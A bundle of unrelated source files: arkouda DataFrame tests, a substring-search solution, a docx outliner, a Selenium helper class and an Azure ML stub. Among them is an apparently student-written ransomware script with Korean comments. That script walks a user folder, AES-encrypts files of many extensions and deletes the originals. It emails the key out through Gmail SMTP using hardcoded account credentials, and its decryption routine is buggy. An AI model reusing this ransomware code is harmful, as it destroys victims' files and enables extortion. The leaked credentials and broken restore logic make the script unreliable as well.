assert ak_ans.to_list() == pd_ans.to_list()
# pandas groupby doesn't return the column used to group
cols_without_group_on = list(set(df.columns) - {group_on})
ak_ans = getattr(df.groupby(group_on), agg)()[cols_without_group_on]
pd_ans = getattr(pd_df.groupby(group_on), agg)()[cols_without_group_on]
# we don't currently support index names in arkouda
pd_ans.index.name = None
assert_frame_equal(pd_ans, ak_ans.to_pandas(retain_index=True))
def test_argsort(self):
df = self.build_ak_df()
p = df.argsort(key="userName")
assert p.to_list() == [0, 2, 5, 1, 4, 3]
p = df.argsort(key="userName", ascending=False)
assert p.to_list() == [3, 4, 1, 5, 2, 0]
def test_coargsort(self):
df = self.build_ak_df()
p = df.coargsort(keys=["userID", "amount"])
assert p.to_list() == [0, 5, 2, 1, 4, 3]
p = df.coargsort(keys=["userID", "amount"], ascending=False)
assert p.to_list() == [3, 4, 1, 2, 5, 0]
def test_sort_values(self):
userid = [111, 222, 111, 333, 222, 111]
userid_ak = ak.array(userid)
# sort userid to build dataframes to reference
userid.sort()
df = ak.DataFrame({"userID": userid_ak})
ord = df.sort_values()
assert_frame_equal(pd.DataFrame(data=userid, columns=["userID"]), ord.to_pandas())
ord = df.sort_values(ascending=False)
userid.reverse()
assert_frame_equal(pd.DataFrame(data=userid, columns=["userID"]), ord.to_pandas())
df = self.build_ak_df()
ord = df.sort_values(by="userID")
ref_df = self.build_pd_df()
ref_df = ref_df.sort_values(by="userID").reset_index(drop=True)
assert_frame_equal(ref_df, ord.to_pandas())
ord = df.sort_values(by=["userID", "day"])
ref_df = ref_df.sort_values(by=["userID", "day"]).reset_index(drop=True)
assert_frame_equal(ref_df, ord.to_pandas())
with pytest.raises(TypeError):
df.sort_values(by=1)
def test_intx(self):
username = ak.array(["Alice", "Bob", "Alice", "Carol", "Bob", "Alice"])
userid = ak.array([111, 222, 111, 333, 222, 111])
df_1 = ak.DataFrame({"user_name": username, "user_id": userid})
username = ak.array(["Bob", "Alice"])
userid = ak.array([222, 445])
df_2 = ak.DataFrame({"user_name": username, "user_id": userid})
rows = ak.intx(df_1, df_2)
assert rows.to_list() == [False, True, False, False, True, False]
df_3 = ak.DataFrame({"user_name": username, "user_number": userid})
with pytest.raises(ValueError):
rows = ak.intx(df_1, df_3)
def test_apply_perm(self):
df = self.build_ak_df()
ref_df = self.build_pd_df()
ord = df.sort_values(by="userID")
perm_list = [0, 3, 1, 5, 4, 2]
default_perm = ak.array(perm_list)
ord.apply_permutation(default_perm)
ord_ref = ref_df.sort_values(by="userID").reset_index(drop=True)
ord_ref = ord_ref.reindex(perm_list).reset_index(drop=True)
assert_frame_equal(ord_ref, ord.to_pandas())
def test_filter_by_range(self):
userid = ak.array([111, 222, 111, 333, 222, 111])
amount = ak.array([0, 1, 1, 2, 3, 15])
df = ak.DataFrame({"userID": userid, "amount": amount})
filtered = df.filter_by_range(keys=["userID"], low=1, high=2)
assert filtered.to_list() == [False, True, False, True, True, False]
def test_copy(self):
username = ak.array(["Alice", "Bob", "Alice", "Carol", "Bob", "Alice"])
userid = ak.array([111, 222, 111, 333, 222, 111])
df = ak.DataFrame({"userName": username, "userID": userid})
df_copy = df.copy(deep=True)
assert_frame_equal(df.to_pandas(), df_copy.to_pandas())
df_copy.__setitem__("userID", ak.array([1, 2, 1, 3, 2, 1]))
assert df["userID"].to_list() != df_copy["userID"].to_list()
df_copy = df.copy(deep=False)
df_copy.__setitem__("userID", ak.array([1, 2, 1, 3, 2, 1]))
assert_frame_equal(df.to_pandas(), df_copy.to_pandas())
def test_isin(self):
df = ak.DataFrame({"col_A": ak.array([7, 3]), "col_B": ak.array([1, 9])})
# test against pdarray
test_df = df.isin(ak.array([0, 1]))
assert test_df["col_A"].to_list() == [False, False]
assert test_df["col_B"].to_list() == [True, False]
# Test against dict
test_df = df.isin({"col_A": ak.array([0, 3])})
assert test_df["col_A"].to_list() == [False, True]
assert test_df["col_B"].to_list() == [False, False]
# test against series
i = ak.Index(ak.arange(2))
s = ak.Series(data=ak.array([3, 9]), index=i.index)
test_df = df.isin(s)
assert test_df["col_A"].to_list() == [False, False]
assert test_df["col_B"].to_list() == [False, True]
# test against another dataframe
other_df = ak.DataFrame({"col_A": ak.array([7, 3], dtype=ak.bigint), "col_C": ak.array([0, 9])})
test_df = df.isin(other_df)
assert test_df["col_A"].to_list() == [True, True]
assert test_df["col_B"].to_list() == [False, False]
def test_multiindex_compat(self):
# Added for testing Issue #1505
df = ak.DataFrame({"a": ak.arange(10), "b": ak.arange(10), "c": ak.arange(10)})
df.groupby(["a", "b"]).sum("c")
def test_uint_greediness(self):
# default to uint when all supportedInt and any value > 2**63
# to avoid loss of precision see (#1983)
df = pd.DataFrame({"Test": [2**64 - 1, 0]})
assert df["Test"].dtype == ak.uint64
def test_head_tail_datetime_display(self):
# Reproducer for issue #2596
values = ak.array([1689221916000000] * 100, dtype=ak.int64)
dt = ak.Datetime(values, unit="u")
df = ak.DataFrame({"Datetime from Microseconds": dt})
# verify _get_head_tail and _get_head_tail_server match
assert df._get_head_tail_server().__repr__() == df._get_head_tail().__repr__()
def test_head_tail_resetting_index(self):
# Test that issue #2183 is resolved
df = ak.DataFrame({"cnt": ak.arange(65)})
# Note we have to call __repr__ to trigger head_tail_server call
bool_idx = df[df["cnt"] > 3]
bool_idx.__repr__()
assert bool_idx.index.index.to_list() == list(range(4, 65))
slice_idx = df[:]
slice_idx.__repr__()
assert slice_idx.index.index.to_list() == list(range(65))
# verify it persists non-int Index
idx = ak.concatenate([ak.zeros(5, bool), ak.ones(60, bool)])
df = ak.DataFrame({"cnt": ak.arange(65)}, index=idx)
bool_idx = df[df["cnt"] > 3]
bool_idx.__repr__()
# the new index is first False and rest True (because we lose first 4),
# so equivalent to arange(61, bool)
assert bool_idx.index.index.to_list() == ak.arange(61, dtype=bool).to_list()
slice_idx = df[:]
slice_idx.__repr__()
assert slice_idx.index.index.to_list() == idx.to_list()
def test_subset(self):
df = ak.DataFrame(
{
"a": ak.arange(100),
"b": ak.randint(0, 20, 100),
"c": ak.random_strings_uniform(0, 16, 100),
"d": ak.randint(25, 75, 100),
}
)
df2 = df[["a", "b"]]
assert ["a", "b"] == df2.columns
assert df.index.to_list() == df2.index.to_list()
assert df["a"].to_list() == df2["a"].to_list()
assert df["b"].to_list() == df2["b"].to_list()
| Bears-R-Us/arkouda | PROTO_tests/tests/dataframe_test.py | dataframe_test.py | py | 24,649 | python | en | code | 211 | github-code | 13 |
4593446825 | class Solution:
"""
@param source: A string
@param target: A string
@return: A string denote the minimum window
Return "" if there is no such a string
"""
def minWindow(self, source, target):
# write your code here
d, dt = {}, dict.fromkeys(target, 0)
for c in target: d[c] = d.get(c, 0) + 1
pi, pj = 0, 0
count = 0
ans = ''
while pj < len(source):
if source[pj] in d:
if dt[source[pj]] < d[source[pj]]:
count += 1
dt[source[pj]] += 1
if count == len(target): # same char count
while pi < pj:
if source[pi] in dt:
if dt[source[pi]] == d[source[pi]]: # skip the useless
break
dt[source[pi]] -= 1
pi += 1
if ans == '' or (pj - pi) < len(ans): # new ans
ans = source[pi:pj + 1]
dt[source[pi]] -= 1
pi += 1
count -= 1
pj += 1
return ans | ultimate010/codes_and_notes | 32_minimum-window-substring/minimum-window-substring.py | minimum-window-substring.py | py | 1,173 | python | en | code | 0 | github-code | 13 |
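# Illustrative usage (classic example; not part of the original solution):
if __name__ == "__main__":
    print(Solution().minWindow("ADOBECODEBANC", "ABC"))  # expected: "BANC"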
18807651704 | # -*- coding: utf-8 -*-
# by Alejandro Rojo Gualix 2022-02 ...
__author__ = 'Alejandro Rojo Gualix'
"""
pip install python-docx freeplane-io
"""
import sys
import argparse
from pathlib import Path
import re
import freeplane
# python-docx
from docx import Document
from docx.enum.text import WD_COLOR_INDEX
"""
SR. No. Colour Name In WD_COLOR_INDEX Colour Description
1. AUTO Default or No Colour
2. BLACK Black Colour
3. BLUE Blue Colour
4. BRIGHT_GREEN Green Colour
5. DARK_BLUE Dark Blue Colour
6. DARK_RED Dark Red Colour
7. DARK_YELLOW Dark Yellow Colour
8. GRAY_25 Light Gray Colour
9. GRAY_50 Dark Gray Colour
10. GREEN Dark Green Colour
11. PINK Magenta Colour
12. RED Red Colour
13. TEAL Dark Cyan Colour
14. TURQUOISE Cyan Colour
15. VIOLET Dark Magenta Colour
16. WHITE White Colour
17. YELLOW Yellow Colour
"""
from summarizer import *
extensions = ['*.odt', '*.docx']
extensions = ['*.docx']
class Outliner:
def __init__(self, file: Path):
self.file = file
# look for title?
self.name = file.stem
self.document = Document(file)
self._output_document = Document()
self._output_midmapping = None
def extract_marks(self, doc_file: Path = None, freeplane_file: Path = None, summarizer=None,
select_bold=True, select_underline=False, highlighted_color=None):
sample = ''
for paragraph in self.document.paragraphs:
sample += paragraph.text + '\n'
if len(sample) > 100:
break
if not sample:
return
def text_filter(run):
# print(run.font.highlight_color, run.text)
return (select_bold and run.bold) or \
(select_underline and run.underline) or \
(highlighted_color and run.font.highlight_color == highlighted_color)
if freeplane_file:
self._output_midmapping = freeplane.Mindmap()
self._output_midmapping.rootnode.plaintext = self.name
parents_stack = [self._output_midmapping.rootnode]
def append_summary(text):
result = summarize(text, summarizer, max_length=min(120, int(len(text) * 0.3)))
summary = result[0]['summary_text']
# print('summary', summary)
if doc_file:
self._output_document.add_paragraph(summary)
if freeplane_file: # Freeplane
node = parents_stack[-1].add_child(summary)
node._node.attrib["STYLE"] = 'fork'
styles = set()
section_text = []
for paragraph in self.document.paragraphs:
style = paragraph.style.name
styles.add(style)
if style.startswith("Title") or style.startswith("Heading"):
if summarizer and section_text:
compiled_text = '\n'.join(section_text)
append_summary(compiled_text)
section_text = []
if style.startswith("Title"):
level = 1 # TODO 0
elif style.startswith("Heading"):
m = re.search(r'(\d+)$', style)
level = int(m.group(0))
if doc_file:
self._output_document.add_heading(paragraph.text, level)
if freeplane_file:
# Freeplane
# print('\t', level, len(parents_stack) - 1)
if level > len(parents_stack) - 1: # rise level
while level > len(parents_stack):
parents_stack.append(parents_stack[-1].add_child('<missing branch>'))
else: # drop: same or lower the level
while len(parents_stack) - level > 0:
parents_stack.pop()
node = parents_stack[-1].add_child(paragraph.text)
node._node.attrib["STYLE"] = 'bubble'
parents_stack.append(node)
# elif paragraph.style.name == "Normal":
# elif style.startswith("Body Text"):
else: # Body Text
if summarizer:
# accumulate whole section
section_text.append(paragraph.text)
else:
selected_text = [run.text for run in paragraph.runs if text_filter(run)]
if selected_text:
if doc_file:
compiled_text = ' […] '.join(selected_text)
self._output_document.add_paragraph(compiled_text)
if freeplane_file: # Freeplane
# TODO: use topic models
node_parent = parents_stack[-1].add_child(selected_text[0])
node_parent._node.attrib["STYLE"] = 'fork'
for segment in selected_text[1:]:
node = node_parent.add_child(segment)
node._node.attrib["STYLE"] = 'fork'
# summarize residual last section if needed
if summarizer and section_text:
compiled_text = '\n'.join(section_text)
append_summary(compiled_text)
section_text = []
# for h, t in zip(headings, texts):
# print(h, t)
# print('\n'.join(styles))
if doc_file:
self._output_document.save(doc_file)
if freeplane_file:
self._output_midmapping.save(freeplane_file, encoding='utf-8')
# if not doc_file and not freeplane_file:
def process_file(input_file_path: Path, actions: dict,
doc_path: Path = None, freeplane_path: Path = None, file_tag='outline'):
assert input_file_path.exists(), 'input file not found'
outliner = Outliner(input_file_path)
if doc_path and doc_path.is_dir():
doc_path = Path(doc_path, f'{input_file_path.stem}_{file_tag}.docx')
if freeplane_path and freeplane_path.is_dir():
freeplane_path = Path(freeplane_path, f'{input_file_path.stem}_{file_tag}.mm')
print(input_file_path, ' --> ', doc_path, freeplane_path)
outliner.extract_marks(doc_file=doc_path, freeplane_file=freeplane_path, **actions)
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="""Reads a `docx` word document and outputs a new document that preserves the document structure (headings) but replaces the content with either:
+ an automatic summary (summarized with a pipeline for the language given via -s), or
+ a compilation of bold/underlined/highlighted segments (annotated by the user beforehand, e.g. because they mark important terms or ideas)
""")
# positional
parser.add_argument('input', metavar='input file', type=str,
help='input path (file or folder) for highlighting compilation or automatic summarization')
# parser.add_argument('output', metavar='output file', type=str, help='output path (file or folder)')
# OUTPUT
parser.add_argument('-d', '--docx', type=str, help='Specify word document output path')
parser.add_argument('-f', '--freeplane', type=str, help='Specify freeplane document output path')
parser.add_argument('-r', '--recursive', action='store_true',
help='Use it along a folder input and output: it makes available all files within subfolders')
# conversion options
parser.add_argument('-b', '--bold', action='store_true', help='filter bold content')
parser.add_argument('-u', '--underline', action='store_true', help='filter underlined content')
parser.add_argument('-s', '--summary', type=str, help='creates a summary, it requires language code, eg.: en')
# optional & mutually exclusive
# parser.add_argument("-a", "--action", type=str, default='marks', choices=["marks", "summary"], help="Choose action to process document content")
args = parser.parse_args()
# print(args)
assert args.docx or args.freeplane, 'A docx or freeplane output file/folder must be provided'
input_path = Path(args.input)
assert input_path.exists(), 'input file/folder not found'
if args.summary:
summarizer = load_pipeline(language=args.summary)
actions = {'summarizer': summarizer}
file_tag = 'summary'
elif args.bold or args.underline:
actions = {'select_bold': args.bold, 'select_underline': args.underline}
file_tag = 'annotation'
else:
raise SyntaxError('some arguments must be provided to indicate action on content: (-b -u | -s <lang>)')
if input_path.is_file():
files = [input_path]
elif input_path.is_dir():
if args.docx:
assert Path(args.docx).is_dir()
if args.freeplane:
assert Path(args.freeplane).is_dir()
# get input files
        if args.recursive:
            files = list(input_path.rglob('*.docx'))
        else:
            files = list(input_path.glob('*.docx'))
        assert files, 'No .docx files found in ' + str(input_path.resolve())
for file_path in files:
process_file(file_path, actions,
Path(args.docx) if args.docx else None, Path(args.freeplane) if args.freeplane else None,
file_tag)
| alerojorela/document-outliner | outliner.py | outliner.py | py | 9,271 | python | en | code | 0 | github-code | 13 |
20680351498 | from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import *
from core.decorators import log_exception
from utilities.config import Config
import platform
import logging
import time
class BaseClass(object):
"""
Base class representation.
Contains all actions related to UI interaction.
All pages may be inherited from this class.
"""
def __init__(self, browser):
"""
:param browser: selenium.webdriver.*
"""
self.browser = browser
self.logger = logging.getLogger(self.__class__.__name__)
self.timeout = 10
@staticmethod
def sleep(s):
time.sleep(s)
@log_exception('Failed to clean cache and cookies')
def clean_coockies_and_cache(self):
if Config.BROWSERNAME == 'Chrome':
self.browser.delete_all_cookies()
self.browser.get('chrome://settings/clearBrowserData')
self.sleep(2)
ActionChains(self.browser).send_keys(Keys.TAB * 3 + Keys.DOWN * 3).perform()
self.sleep(2)
ActionChains(self.browser).send_keys(Keys.TAB * 4 + Keys.ENTER).perform()
self.sleep(5) # wait some time to finish
@log_exception('Failed to get web element with xpath: {}')
def _get_element(self, element, ec=ec.presence_of_element_located, wait=None):
"""
Function for getting WebElement from given xpath.
Also performs highlight of that element if Config.HIGHLIGHT is True.
:param element: str - web element xpath or can be selenium.webdriver.remote.webelement.WebElement
        :param ec: selenium.webdriver.support.expected_conditions.*
:param wait: int - element wait time, if None takes self.timeout
:return: element: selenium.webdriver.remote.webelement.WebElement
"""
if wait is None:
wait = self.timeout
if isinstance(element, str):
            self.logger.debug('Waiting {} seconds for web element with condition: {}'.format(wait, expected_condition.__name__))
            wd_wait = WebDriverWait(self.browser, wait)
            element = wd_wait.until(expected_condition((By.XPATH, element)))
if element:
self.logger.debug('Got web element!')
if Config.HIGHLIGHT:
self._highlight(element)
return element
@log_exception('Failed to get web elements with xpath: {}')
def get_elements(self, xpath, wait=None):
"""
Get multiple elements by xpath.
:param xpath: str - web element xpath
:param wait: int - wait time for object
:return: tuple of selenium.webdriver.remote.webelement.WebElement
"""
self.logger.debug('Getting web elements with xpath: {}'.format(xpath))
self._get_element(xpath, wait=wait)
elements = self.browser.find_elements_by_xpath(xpath)
self.logger.debug('Got web elements with xpath: {}'.format(xpath))
return elements
def _highlight(self, element):
"""
Highlight given web element with red border using JS execution.
WARNING: Contains time.sleep in 1 sec between scrolling to element and highlighting
:param element: selenium.webdriver.remote.webelement.WebElement
"""
self.execute_script(element, 'scrollIntoView(true);')
self.sleep(1)
self.execute_script(element, 'setAttribute("style", "color: red; border: 5px solid red;");')
self.sleep(1)
self.execute_script(element, 'setAttribute("style", "");')
@log_exception('Failed presence check of web element with xpath: {}')
def is_present(self, xpath, expected=True, wait=None):
"""
Presence check of web element on the UI.
:param xpath: str - web element xpath
:param wait: int - wait time for object
:param expected: boolean - expected to find it
:return: boolean - element presence
"""
        expected_condition = ec.presence_of_element_located
        if not expected:
            # staleness_of expects an already-located WebElement, not a locator
            # tuple, so for an "absent" check wait for the locator to stop matching
            expected_condition = ec.invisibility_of_element_located
        self.logger.info('Checking presence of web element with xpath: {}. Expected: {!s}'.format(xpath, expected))
        found = self._get_element(xpath, expected_condition, wait=wait) is not None
self.logger.info('Presence check of web element with xpath: {}. Result: {!s}'.format(xpath, found))
return found
@log_exception('Failed visible check of web element with xpath: {}')
def is_visible(self, xpath, expected=True, wait=None):
"""
Visibility check of web element on the UI.
:param xpath: str - web element xpath
:param wait: int - wait time for object
:param expected: boolean - expected to be visible
:return: boolean - element visibility
"""
        expected_condition = ec.visibility_of_element_located
        if not expected:
            expected_condition = ec.invisibility_of_element_located
        self.logger.info('Checking visibility of web element with xpath: {}. Expected: {!s}'.format(xpath, expected))
        result = self._get_element(xpath, expected_condition, wait=wait)
        # invisibility_of_element_located may resolve to a bare True rather than an
        # element, so only call is_displayed() when a visible element is expected
        visible = result.is_displayed() if expected else False
        self.logger.info('Visible check of web element with xpath: {}. Result: {!s}'.format(xpath, visible))
        return visible
@log_exception('Failed to click web element with xpath: {}')
def click(self, xpath, wait=None, scroll=True):
"""
Click web element with given xpath
:param xpath: str - web element xpath
:param wait: int - wait time for object
"""
self.logger.info('Clicking web element with xpath: {}'.format(xpath))
element = self._get_element(xpath, ec.element_to_be_clickable, wait=wait)
if scroll:
self.execute_script(element, 'scrollIntoView(true);')
element.click()
self.logger.info('Clicked web element with xpath: {}'.format(xpath))
def execute_script(self, element, script):
"""
Execute JavaScript on the web element
:param element: selenium.webdriver.remote.webelement.WebElement
:param script: str - JS script body
:return: result of script execution
"""
if not element:
self.logger.error('Element is None. Cannot execute JS')
raise ValueError('Argument element cannot be None')
return self.browser.execute_script("return arguments[0].{}".format(script), element)
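    # For example, the highlight helper above relies on this wrapper:
    #   self.execute_script(element, 'scrollIntoView(true);')
    # which the browser evaluates as: return arguments[0].scrollIntoView(true);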
@log_exception('Failed to mouse over web element with xpath: {}')
def mouse_over(self, xpath, wait=None):
"""
Simulate mouse cursor over given web element.
:param xpath: str - web element xpath
:param wait: int - wait time for object
"""
actions = ActionChains(self.browser)
actions.move_to_element(self._get_element(xpath, wait=wait)).perform()
self.logger.info('Mouse over web element with xpath: {}'.format(xpath))
@log_exception('Failed to mouse over web element with xpath: {}')
def mouse_over_with_offset(self, xpath, xoffset, yoffset, wait=None):
"""
Simulate mouse cursor over given web element.
:param xpath: str - web element xpath
:param wait: int - wait time for object
"""
actions = ActionChains(self.browser)
actions.move_to_element_with_offset(self._get_element(xpath, wait=wait), xoffset, yoffset).perform()
self.logger.info('Mouse over web element with xpath: {}'.format(xpath))
@log_exception('Failed to move mouse to coordinates: {}, {}')
def mouse_move_to_coordinates(self, x, y):
"""
Simulate mouse cursor move.
:param x: int
:param y: int
"""
actions = ActionChains(self.browser)
actions.move_by_offset(x, y).perform()
@log_exception('Failed to drag mouse')
def mouse_drag(self, x1, y1, x2, y2):
"""
        Simulate a mouse drag from (x1, y1) to (x2, y2).
        :param x1: int - drag start x
        :param y1: int - drag start y
        :param x2: int - drag end x
        :param y2: int - drag end y
        """
actions = ActionChains(self.browser)
actions.move_by_offset(x1, y1)\
.click_and_hold()\
.move_by_offset(x2 - x1, y2 - y1)\
.release()\
.perform()
self.logger.info('Mouse drag for: {}, {}'.format(x2 - x1, y2 - y1))
@log_exception('Failed open URL: {}')
def open(self, url):
"""
Open given URL in browser
:param url: str - URL to open
"""
self.browser.get(url)
self.logger.info('Opened URL: {}'.format(url))
@log_exception('Failed open new tab: {}')
def open_new_tab(self):
"""
Open new tab in browser
"""
        win_handles_before = self.browser.window_handles
        self.browser.execute_script("window.open('');")
        WebDriverWait(self.browser, self.timeout).until(ec.number_of_windows_to_be(len(win_handles_before) + 1))
        win_handles_after = self.browser.window_handles
        new_window = [x for x in win_handles_after if x not in win_handles_before][0]
        self.browser.switch_to.window(new_window)
@log_exception('Failed to switch tab: {}')
def switch_to_tab_with_num(self, tab_num):
"""
Switches driver to new tab only. Works by number of tab, counts from 0.
"""
        self.browser.switch_to.window(self.browser.window_handles[tab_num])
@log_exception('Cannot switch to frame: {}')
def switch_to_frame(self, xpath, wait=None):
"""
Switch to frame
:param xpath: str - frame xpath
"""
self.browser.switch_to.frame(self._get_element(xpath, wait=wait))
@log_exception('Cannot switch to default frame')
def switch_to_default_frame(self):
"""
Switch to default frame
"""
self.browser.switch_to.default_content()
@log_exception('Cannot get text located: {}')
def get_text(self, xpath, wait=None):
"""
Get text of the web element
:param xpath: str - web element xpath
:param wait: int - wait time for object
"""
self.logger.info('Trying to get text from field with xpath: {}'.format(xpath))
result = self._get_element(xpath, ec.visibility_of_element_located, wait=wait).text
self.logger.info('Got text "{}" from field with xpath: {}'.format(result, xpath))
return result
@log_exception('Failed to type text into web element with xpath: {}')
def type(self, xpath, text, one_by_one=False, wait=None, lazy_wait=2):
"""
Type text into input field with given xpath
:param xpath: str - web element xpath
:param text: str - text to type
:param wait: int - wait time for object
:param lazy_wait: int - wait time for lazy download objects
"""
self.logger.info('Typing "{}" into field with xpath: {}'.format(text, xpath))
input_field = self._get_element(xpath, ec.visibility_of_element_located, wait=wait)
if platform.system() == 'Darwin': # mac os
input_field.clear()
else: # others
input_field.send_keys(Keys.CONTROL, 'a', Keys.DELETE)
self.sleep(lazy_wait / 2)
if one_by_one:
for char in text:
input_field.send_keys(char)
else:
input_field.send_keys(text)
self.sleep(lazy_wait / 2)
self.logger.info('Typed "{}" into field with xpath: {}'.format(text, xpath))
@log_exception('Cannot send ENTER to the web element with xpath: {}')
def send_enter(self, xpath, wait=None, lazy_wait=1):
"""
Emulate sending ENTER key from keyboard to the given web element.
:param xpath: str - web element xpath
:param wait: int - wait time for object
:param lazy_wait: int - wait time for lazy download objects
"""
self._get_element(xpath, wait=wait).send_keys(Keys.ENTER)
self.sleep(lazy_wait)
def submit_search(self, xpath, text, wait=None, lazy_wait=2):
"""
Type text into input field with given xpath and send ENTER key
:param xpath: str - web element xpath
:param text: str - text to type
:param wait: int - wait time for object
:param lazy_wait: int - wait time for lazy download objects
"""
self.type(xpath, text, wait=wait, lazy_wait=lazy_wait)
self.send_enter(xpath, wait=wait, lazy_wait=lazy_wait)
def get_element_size(self, element_locator, wait=None):
"""
Return size of element in list
:param element_locator: str - xpath for element
:param wait: int - wait time for object
:return: dict contains width and heigth
"""
element = self._get_element(element_locator, wait=wait)
return element.size
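# A minimal usage sketch (driver construction is an assumption -- any selenium
# webdriver instance works; the xpath is hypothetical):
#   from selenium import webdriver
#   page = BaseClass(webdriver.Chrome())
#   page.open('https://example.com')
#   if page.is_visible("//button[@id='ok']"):
#       page.click("//button[@id='ok']")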
| Derr22/python-selenium-behave-parallel-runner | core/base_class.py | base_class.py | py | 13,097 | python | en | code | 0 | github-code | 13 |
30787526166 | from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import pad, unpad
import uuid
import hashlib
import os  # modules needed for encryption
import smtplib
from email.mime.text import MIMEText  # used to set the subject and body of the mail message
# arr is the list of file extensions to lock
arr = ['.txt', '.doc', '.docx', '.hwp', '.pptx', '.ppt', '.xls', '.pdf', '.ai', '.psd', '.tx', '.bmp', '.gif', '.png', '.jpg', '.jpeg', '.raw', '.tiff', '.was', '.wma', '.mp3', '.mp4', '.mkv', '.avi', '.flv', '.mov', '.7z', '.aip', '.alz', '.egg', '.zip', '.py', '.c', '.cpp', '.java', '.class', '.html', '.ini', '.lnk', '.exe', '.ttf', '.sys', '.dat', '.jar', '.md']
forChange = []  # holds only the files whose extension matched
linkForChange = []  # list of full paths to files with target extensions
link = 'C:\\Users\\tlatm\\OneDrive\\바탕 화면\\test'  # files inside the test folder on the author's machine
file_list = os.listdir(link)  # store every entry under the link path in file_list
def isFile(llist, llink):
    noChange = []  # folder entries
    global forChange
    global linkForChange
    ffile_list = llist
    global link
    # nested loop: check every entry of the current file list against the extension list
    for i in range(0, len(ffile_list)):
        for j in range(0, len(arr)):
            if ffile_list[i].find(arr[j]) >= 0:  # if the file name contains this extension,
                linkForChange.append(llink + '\\' + ffile_list[i])  # store the path joined with the file name
                forChange.append(ffile_list[i])  # add the file itself
    # turn the full list, the matched list and the folder list into sets to drop duplicates
    ffile_list_set = set(ffile_list)
    forChange_set = set(forChange)
    noChange_set = set(noChange)
    noChange_set = ffile_list_set - forChange_set  # the full set minus the matched set leaves the folders
    noChange = list(noChange_set)
    if not len(noChange):  # stop once no folder entries remain
        return
    else:
        for i in range(0, len(noChange)):
            tempLink = link  # remember the current link path before descending
            link += '\\' + noChange[i]  # this effectively becomes the final path
            ffile_list = os.listdir(link)
            isFile(ffile_list, link)
            link = tempLink  # restore the path after the recursive call returns
isFile(file_list, link)
linkForChange_set = set(linkForChange)
linkForChange = list(linkForChange_set)  # drop duplicate paths from the list
print(linkForChange)
'''
for i in range(0, len(linkForChange)):
    Encryption(linkForChange[i])
'''
Block_Size = 256
chunksize = 256*1024
extension = []  # list of original extensions
file_name = []  # list of original file names
# names and extensions are stored at matching indices so decryption can rebuild them later
print("**Encryption**")
print(hex(uuid.getnode()).encode('utf8'))  # remove later!!! prints the decryption key on screen only to ease testing
original_password = hex(uuid.getnode()).encode('utf8')  # use the MAC address, converted to hex, as the password
smtp = smtplib.SMTP('smtp.gmail.com', 587)
smtp.starttls()  # required when using TLS
smtp.login('pythonransomware@gmail.com', 'bnzrajjwqrzllgvf')  # account used to send the decryption key - address, password
msg = MIMEText(hex(uuid.getnode()))  # the decryption key
msg['Subject'] = 'test'
smtp.sendmail('pythonransomware@gmail.com', 'tlatmdals01@gmail.com', msg.as_string())  # sender of the decryption key, recipient of the decryption key
smtp.quit()
# AES encryption needs a 32-byte key; hashlib converts the user password into one.
key = hashlib.pbkdf2_hmac(hash_name='sha256', password=original_password, salt=b'$3kj##agh_', iterations=100000)
# this derives the encryption key.
# the secret to encrypt is likewise converted to bytes with encode("utf8").
# text = input("Secret to encrypt: ").encode("utf8")
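# Sanity-check sketch: PBKDF2 is deterministic, so the same password and salt
# always derive the same 32-byte AES key (the b'pw' password below is illustrative):
#   k1 = hashlib.pbkdf2_hmac('sha256', b'pw', b'$3kj##agh_', 100000)
#   k2 = hashlib.pbkdf2_hmac('sha256', b'pw', b'$3kj##agh_', 100000)
#   assert k1 == k2 and len(k1) == 32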
for k in range(0, len(linkForChange)):
    fileFullname = linkForChange[k]
    filename, FileExtension = os.path.splitext(linkForChange[k])  # split into file name and extension, stored separately
    extension.append(FileExtension)  # add the extension to its list
    file_name.append(filename)  # add the file name to its list
    # the original size is needed for restoration; read it and zero-pad it to 16 bytes
    filesize = str(os.path.getsize(fileFullname)).zfill(16)
    # build an AES object for encryption; decryption must build the identical object
    mode = AES.MODE_ECB
    aes = AES.new(key, mode)
    # read the file; loading a large file such as a video all at once raises errors,
    # so read it in fixed-size chunks (chunksize above) and encrypt chunk by chunk
    # file-encryption part
    with open(fileFullname, 'rb') as infile:  # read in binary mode: test.txt
        with open(filename + ".pay1oad", 'wb') as outfile:  # write in binary mode: test.pay1oad
            outfile.write(filesize.encode('utf-8'))
            while True:
                chunk = infile.read(chunksize)
                # once the whole file has been read, leave the loop and move on
                if len(chunk) == 0:
                    break
                # pad the last chunk with _ so its length is a block multiple; otherwise AES errors out
                elif len(chunk) % 16 != 0:
                    chunk += b'_' * (256 - (len(chunk) % 256))
                # write the encrypted chunk into the new file
                outfile.write(aes.encrypt(chunk))
    os.remove(fileFullname)
print("**복호화**")
original_password = input("password: ").encode('utf8')
#복호화를 위하여 AES 객체를 만든다. 사실 암호화과정에서 만든 AES 객체를 다시 이용해도 무방 \
key = hashlib.pbkdf2_hmac(hash_name='sha256', password=original_password, salt=b'$3kj##agh_', iterations=100000)
#복호화할 파일을 지정한다.
for l in range(0, len(linkForChange)):
filename = os.path.splitext(linkForChange[k])[0]
#파일을 불러들이다. 동영상과 같은 대용량 파일의 경우, 한번에 불러들이면 에러가 난다.
#이를 방지하기 위해서 일정한 크기(위의 chunksize)로 나누어 불러들이고, 여러차례 암호화를 실시
fileFullname = file_name[l] + '.pay1oad' #.pay1oad로 바뀐 확장자에 맞춰서 이름 변경
#파일 복호화 파트
with open(fileFullname, 'rb') as infile:
filesize = int(infile.read(16))
#복호화된 파일을 저장할 파일을 만든다.
with open(file_name[l] + extension[l], 'wb') as outfile:
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
#복호화된 내용을 새로운 파일에 삽입한다.
outfile.write(aes.decrypt(chunk))
#원래의 파일사이즈를 넘는 부분은 암호화과정에서 16byte로 만들기 위해서 _를 삽입한 부분이다.
#다음과 같이 truncate명령어를 써서 원래의 파일사이즈를 넘는 부분은 제거해 버린다.
outfile.truncate(filesize)
os.remove(fileFullname) #.payload 확장자 파일 삭제
print("복호화 완료")
| smpark0213/P-RansomeWare | encryptdecrypt.py | encryptdecrypt.py | py | 7,726 | python | ko | code | 0 | github-code | 13 |
1050886381 | import json
import joblib
import numpy as np
import os
# called when the deployment is created or updated
def init():
global model
# get the path to the registered model file and load it
# AZUREML_MODEL_DIR is an environment variable created during deployment.
